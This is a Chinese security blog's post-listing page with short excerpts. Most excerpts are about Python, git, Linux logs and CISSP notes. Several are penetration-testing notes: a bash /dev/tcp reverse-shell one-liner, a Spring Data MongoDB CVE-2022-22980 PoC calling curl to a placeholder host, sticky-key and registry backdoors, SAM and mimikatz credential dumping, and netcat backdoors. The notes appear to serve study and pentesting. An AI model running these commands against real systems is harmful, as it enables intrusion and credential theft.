摘要: 我超怕的 - HTTP simple file server use Python - https://www.cnblogs.com/iAmSoScArEd/p/17745959.html How to use 安装依赖:pip3 install flask 保存到文本simple_file_se 阅读全文
posted @ 2023-10-07 11:50 我超怕的 阅读(92) 评论(0) 推荐(0) 编辑
摘要: 我超怕的 -https://www.cnblogs.com/iAmSoScArEd/p/17727571.html Code #!/bin/bash # Specify the directory where user home directories are located USER_HOME_D 阅读全文
posted @ 2023-09-25 11:25 我超怕的 阅读(35) 评论(0) 推荐(0) 编辑
摘要: 我超怕的 - https://www.cnblogs.com/iAmSoScArEd/p/17315419.html 要通过进程树监控 Web 应用程序代码执行的命令,可以按照以下步骤进行操作: 打开终端,并查找正在运行的 Web 应用程序的进程 ID。 ps -ef | grep -i <appl 阅读全文
posted @ 2023-04-13 16:50 我超怕的 阅读(64) 评论(0) 推荐(0) 编辑
摘要: 我超怕的 - https://www.cnblogs.com/iAmSoScArEd/p/17287883.html Windows主机后门 1、粘滞键 替换c:\windows\system32\sethc.exe 为后门程序 2、注册表 HKCU:Software\Microsoft\Windo 阅读全文
posted @ 2023-04-04 20:55 我超怕的 阅读(89) 评论(0) 推荐(0) 编辑
摘要: 我超怕的 https://www.cnblogs.com/iAmSoScArEd/p/17213464.html 内容及备注:OSG 第一遍 什么时候看:学完速刷回忆 以后用快查 最近更新:2023年5月16 CISSP 1.安全与风险管理15% 安全概念 CIA P2 DAD、过度保护、真实性、不 阅读全文
posted @ 2023-03-14 00:29 我超怕的 阅读(843) 评论(0) 推荐(0) 编辑
摘要: https://www.cnblogs.com/iAmSoScArEd/p/17189780.html 我超怕的 票据传递提权 1、mimikatz主机密码获取、破解、NTLM Hash获取、Hash传递 2、kekeo票据传递 PsExec提权 1、PsExec 在存在ipc的环境下获取目标主机s 阅读全文
posted @ 2023-03-08 21:13 我超怕的 阅读(241) 评论(0) 推荐(0) 编辑
摘要: 我超怕的 https://www.cnblogs.com/iAmSoScArEd/p/17169904.html 凭证获取需要System权限。 1、使用GetPass工具 2、使用PwDump7工具 3、使用QuarksPwDump工具(报毒) 4、使用命令导出 reg save hklm\sam 阅读全文
posted @ 2023-03-07 20:40 我超怕的 阅读(196) 评论(0) 推荐(0) 编辑
摘要: https://www.cnblogs.com/iAmSoScArEd/p/17156938.html 我超怕的 IPC(Internet Process Connection),用于进程间通信的命名管道。连接目标时需要验证用户名和密码,可以访问目标机器的文件、目录结构、用户等信息。 需要目标机器启 阅读全文
posted @ 2023-02-26 16:23 我超怕的 阅读(99) 评论(0) 推荐(0) 编辑
摘要: https://www.cnblogs.com/iAmSoScArEd/p/17139141.html 我超怕的 前言:仅记录思路方向,具体技术细节可遇到后对照深入研究。如果有补充,非常欢迎大家评论、留言。 1、利用Windows系统漏洞 匹配可提权漏洞编号,系统是否缺失该补丁。 1、人工查用sys 阅读全文
posted @ 2023-02-20 22:02 我超怕的 阅读(251) 评论(0) 推荐(0) 编辑
摘要: cd到源码根目录 1、初始化模块,生成依赖module文件go.modgo mod init 源码根目录名 2、下载依赖module go get 3、编译源码,生成可执行文件 go build 后续更新代码,若无外部依赖,可直接go build生成可执行文件,不需要重复执行初始化操作。若新增外部依 阅读全文
posted @ 2023-02-17 20:17 我超怕的 阅读(157) 评论(0) 推荐(0) 编辑
摘要: 来自我超怕的 - https://www.cnblogs.com/iAmSoScArEd/p/17120954.html ssh在线官方命令详解 https://man.openbsd.org/ssh 也可以执行 man ssh查看详细命令 为什么选择通过SSH隧道转发? 隐蔽、普遍。 1、本地转发 阅读全文
posted @ 2023-02-14 21:42 我超怕的 阅读(219) 评论(0) 推荐(0) 编辑
摘要: netcat入门指南及nc后门的几种利用方式 来自 https://www.cnblogs.com/iAmSoScArEd/p/17103315.html - 我超怕的 1、查看nc工具帮助信息 nc -h #后期可以通过该命令查看已经忘记的命令参数,也可以用来探索具体有哪些功能 2、获取部分端口B 阅读全文
posted @ 2023-02-09 22:08 我超怕的 阅读(399) 评论(0) 推荐(0) 编辑
摘要: spring data mongodb remote code execution | cve-2022-22980 poc # 原payload# T(java.lang.Runtime).getRuntime().exec("curl http://xxx/success") URLencode 阅读全文
posted @ 2022-07-15 14:42 我超怕的 阅读(231) 评论(0) 推荐(0) 编辑
摘要: # 修改 ./ 为指定路径即可,下面命令默认为当前目录 for i in ./*; do echo $i; find $i | wc -l; done 阅读全文
posted @ 2022-07-13 15:49 我超怕的 阅读(179) 评论(0) 推荐(0) 编辑
摘要: Google MFA+Jumpserver自动连接 - https://www.cnblogs.com/iAmSoScArEd/p/16387057.html 我超怕的 1、先安装expect Linux CentOS:yum install expect Linux Ubuntu:apt inst 阅读全文
posted @ 2022-06-17 21:07 我超怕的 阅读(799) 评论(0) 推荐(0) 编辑
摘要: https://www.cnblogs.com/iAmSoScArEd/p/16386216.html 我超怕的 获取本周星期一 import datetime print(datetime.date.today()-datetime.timedelta(days=datetime.date.tod 阅读全文
posted @ 2022-06-17 16:32 我超怕的 阅读(470) 评论(0) 推荐(0) 编辑
摘要: https://www.cnblogs.com/iAmSoScArEd/p/16386193.html 我超怕的 下载安装 #下载最新版 wget http://download.joedog.org/siege/siege-latest.tar.gz # 解压 tar -zxvf siege-la 阅读全文
posted @ 2022-06-17 16:28 我超怕的 阅读(92) 评论(0) 推荐(0) 编辑
摘要: https://www.cnblogs.com/iAmSoScArEd/p/16264440.html - 我超怕的 报错:Python Mysql unsupported format character 'Y' (0x59) at index xx 报错代码 sql = ''' SELECT D 阅读全文
posted @ 2022-05-12 21:24 我超怕的 阅读(715) 评论(0) 推荐(0) 编辑
摘要: 我怕超的 - https://www.cnblogs.com/iAmSoScArEd/p/16153162.html 1. 两数之和 https://leetcode-cn.com/problems/two-sum/ 给定一个整数数组 nums 和一个整数目标值 target,请你在该数组中找出 和 阅读全文
posted @ 2022-04-16 16:02 我超怕的 阅读(74) 评论(0) 推荐(0) 编辑
摘要: 日志默认存放位置:/var/log/ 查看日志配置情况:more /etc/rsyslog.conf 日志文件说明 /var/log/cron 记录了系统定时任务相关的日志 /var/log/cups 记录打印信息的日志 /var/log/dmesg 记录了系统在开机时内核自检的信息,也可以使用dm 阅读全文
posted @ 2022-02-15 18:07 我超怕的 阅读(863) 评论(0) 推荐(0) 编辑
摘要: 通常1不能直接获取反弹Shell,实战中4很好用 1 bash -i >& /dev/tcp/你的vps ip/监听端口 0>&1 #大部分情况直接执行这个命令不能弹,用下面的 2 Runtime.getRuntime().exec("/bin/bash -c bash${IFS}-i${IFS}> 阅读全文
posted @ 2022-01-06 18:47 我超怕的 阅读(1195) 评论(0) 推荐(0) 编辑
摘要: 进入项目目录后 删除缓存 git rm -r --cached . 添加所有文件 git add . commit后生效 git commit -m "make .gitignore work" 阅读全文
posted @ 2021-12-22 16:33 我超怕的 阅读(119) 评论(0) 推荐(0) 编辑
摘要: 来自-https://www.cnblogs.com/iAmSoScArEd/p/15602016.html -我超怕的 大家都知道用nc开启本机端口监听的命令是:nc -l -v -p 6666 都知道-l是开启监听,-v打印运行时的所有信息,-p指定端口 通常合起来写:nc -lvp 6666 阅读全文
posted @ 2021-11-25 11:45 我超怕的 阅读(1372) 评论(0) 推荐(2) 编辑
摘要: 对于Python3错误: AttributeError: module 'suds' has no attribute 'client' Python3 安装suds失败问题解决: pip uninstall suds pip uninstall client pip install suds-py 阅读全文
posted @ 2021-07-30 12:15 我超怕的 阅读(270) 评论(0) 推荐(0) 编辑
摘要: Python pyMongoDB基础使用 - https://www.cnblogs.com/iAmSoScArEd/p/14903131.html -我超怕的 当不知道MongoDB中有什么数据库时可使用以下函数查询所有数据库: print(client.database_names()) 当不知 阅读全文
posted @ 2021-06-19 15:47 我超怕的 阅读(155) 评论(0) 推荐(0) 编辑
摘要: CTF PHP代码审计之常见Hash总结 -https://www.cnblogs.com/iAmSoScArEd/p/14825040.html 我超怕的 一、MD4 1.1 $a=md4($a) 解决: url?a=0e251288019 url?a=0e898201062 url?a=0e00 阅读全文
posted @ 2021-05-29 12:55 我超怕的 阅读(581) 评论(0) 推荐(0) 编辑
摘要: https://www.cnblogs.com/iAmSoScArEd/p/14805484.html - 我超怕的 1、遍历所有OID snmpwalk -c public -v 2c -O fn xxx.xxx.xxx.xxx .1 xxx.xxx.xxx.xxx为IP 2、查看某个OID的内容 阅读全文
posted @ 2021-05-24 17:50 我超怕的 阅读(416) 评论(0) 推荐(0) 编辑
摘要: Python四分位和中位数计算代码- https://www.cnblogs.com/iAmSoScArEd/p/14832474.html -我超怕的 ############ # Name:计算四分位和中位数 # Author:我超怕的 # Date:2021-05-21 ########### 阅读全文
posted @ 2021-05-21 17:44 我超怕的 阅读(1782) 评论(0) 推荐(0) 编辑
摘要: 针对Android 7.0及以上版本的系统,不信任用户添加的证书,无法抓HTTPS包问题的解决方法。 1、使用XPosed框架(不root选择virtualXposed)+JustTrustMe :https://www.cnblogs.com/xiaochao-testing/p/13985602 阅读全文
posted @ 2021-03-16 11:25 我超怕的 阅读(450) 评论(2) 推荐(0) 编辑
摘要: 网络信息安全管理流程 - https://www.cnblogs.com/iAmSoScArEd/p/14471402.html - 我超怕的 内容来自《信息安全工程师教程》 网络信息安全管理一般遵循如下工作流程: 1、确定网络信息安全管理对象 2、评估网络信息安全管理对象的价值 3、识别网络信息安 阅读全文
posted @ 2021-03-02 21:30 我超怕的 阅读(1098) 评论(0) 推荐(0) 编辑
摘要: Python Flask Web基本运行模版 https://www.cnblogs.com/iAmSoScArEd/p/14307275.html --我超怕的 from flask import Flask,request app = Flask(__name__) app.config['SE 阅读全文
posted @ 2021-01-21 12:03 我超怕的 阅读(158) 评论(0) 推荐(0) 编辑
摘要: Python一行生成16位随机密码 https://www.cnblogs.com/iAmSoScArEd/p/14188138.html 我超怕的 import random random_pwd="".join(random.sample('abcdefghijklmnopqrstuvwxyz! 阅读全文
posted @ 2020-12-25 11:41 我超怕的 阅读(448) 评论(2) 推荐(0) 编辑
摘要: SDL流程 https://www.cnblogs.com/iAmSoScArEd/p/14183928.html 我超怕的 如果在寻找传统SDL流程的互联网同学,这里推荐大家了解一下DevSecOps,更加适合现在的一个代码、功能、上线的版本迭代。可以更好的替代传统SDL。 项目目标 (1)制定面 阅读全文
posted @ 2020-12-24 14:31 我超怕的 阅读(689) 评论(0) 推荐(0) 编辑
摘要: 基本办公安全建设指南 https://www.cnblogs.com/iAmSoScArEd/p/14183850.html 我超怕的 办公安全需要注意及建设的点: 端口检测(在办公电脑或者在网服务器中关闭无关端口,屏蔽高危端口,端口是攻击者探测信息的重要渠道) 边界安全(VPN、WI-FI、) 内 阅读全文
posted @ 2020-12-24 14:21 我超怕的 阅读(697) 评论(0) 推荐(2) 编辑
摘要: 测试脚本: import requests import re def sentry_ssrf(): s = "https://82fddcba63b6324d8a38de946d1bb468@sentry.xxx.com/12" #sentry地址 ssrfReceiveAddr = "https 阅读全文
posted @ 2020-12-15 11:38 我超怕的 阅读(1472) 评论(0) 推荐(0) 编辑
摘要: 1、核心业务机器 高级管理人员、系统管理员、财务/人事/业务人员的个人计算机 产品管理系统服务器 办公系统服务器 财务应用系统服务器 核心产品源码服务器(自建SVN、GIT) 数据库服务器 文件或网盘服务器、共享服务器 电子邮件服务器 网络监控系统服务器 其他服务器(内部技术文档服务器、其他监控服务 阅读全文
posted @ 2020-10-31 19:03 我超怕的 阅读(301) 评论(0) 推荐(0) 编辑
摘要: 内网渗透之域账户查询 https://www.cnblogs.com/iAmSoScArEd/p/13874776.html 来自 我超怕的 1、向域控制器查询所有域账户 net user /domain 2、查询域内用户的详细信息 通常包括:用户名、描述信息、SID、域名、状态 wmic user 阅读全文
posted @ 2020-10-25 19:39 我超怕的 阅读(1361) 评论(0) 推荐(0) 编辑
摘要: 内网渗透测试之域控查找 https://www.cnblogs.com/iAmSoScArEd/p/13874485.html 来自 我超怕的 1、查看域控机器名 nltest /DCLIST:域名 或 netdom query PDCnetdom query查询信息命令的常用语法是: /Domai 阅读全文
posted @ 2020-10-25 18:37 我超怕的 阅读(3152) 评论(0) 推荐(0) 编辑
摘要: 内网渗透测试之域基础信息收集 --https://www.cnblogs.com/iAmSoScArEd/p/13874347.html 来自我超怕的 上一篇域内信息收集用于判断当前主机是否存在某个域内。这一篇主要介绍当确定当前主机所在网络环境存在域,且主机在域内,对域内的信息进行收集。 1、查询所 阅读全文
posted @ 2020-10-25 17:59 我超怕的 阅读(406) 评论(0) 推荐(0) 编辑
摘要: 内网渗透测试之域内端口扫描 port scanning of intranet pentest in domain https://www.cnblogs.com/iAmSoScArEd/p/13869632.html 来自我超怕的 通过端口扫描主要用于得到端口的banner信息、端口上运行的服务、 阅读全文
posted @ 2020-10-24 15:22 我超怕的 阅读(3680) 评论(0) 推荐(0) 编辑